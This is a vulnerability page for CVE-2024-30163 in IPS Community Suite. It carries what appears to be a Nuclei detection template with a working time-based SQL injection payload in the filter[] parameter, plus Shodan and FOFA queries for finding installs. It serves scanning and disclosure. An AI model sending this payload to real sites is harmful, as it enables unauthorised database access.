CVE-2024-30163: IPS Community Suite - Unauthenticated SQL Injection

2025-08-01 IPS Community Suite PoC Public

Description

IPS Community Suite is vulnerable to unauthenticated SQL injection via the filter[] parameter in the /index.php?/store/ endpoint, allowing attackers to extract sensitive information from the database.

PoC

id: CVE-2024-30163

info:
  name: IPS Community Suite - Unauthenticated SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    IPS Community Suite is vulnerable to unauthenticated SQL injection via the filter[] parameter in the /index.php?/store/ endpoint, allowing attackers to extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can execute arbitrary SQL queries, potentially extracting or modifying sensitive database information.
  remediation: |
    Update IPS Community Suite to a version that patches CVE-2024-30163.
  reference:
    - https://karmainsecurity.com/pocs/CVE-2024-30163.php
    - https://nvd.nist.gov/vuln/detail/CVE-2024-30163
  classification:
    cve-id: CVE-2024-30163
    cwe-id: CWE-89
    epss-score: 0.08676
    epss-percentile: 0.94847
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    vendor: invision
    product: ips_community_suite
    max-request: 1
    verified: true
    shodan-query: html:"invision community"
    fofa-query: body="invision community"
  tags: cve,cve2024,ips,invision-community,sqli,vuln

http:
  - raw:
      - |
        @timeout: 30s
        POST /index.php?/store/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cat=1&filter[%60%20ON%201%20UNION%20SELECT%20IF(ORD(SUBSTR((1),1,1))%3C126,1,SLEEP(7))%20OR%20%3F%3D%3F%23]=1

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "contains(tolower(body), 'invision community')"
        condition: and
# digest: 490a00463044022054e9e4a0ff56b5affe9bff00efb31a929ff4467e449d0dbdae798663beec5f3902200d1ffd70320f77d229ff34282d4a290c0a54727884654b3f6ea77bb263202fea:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities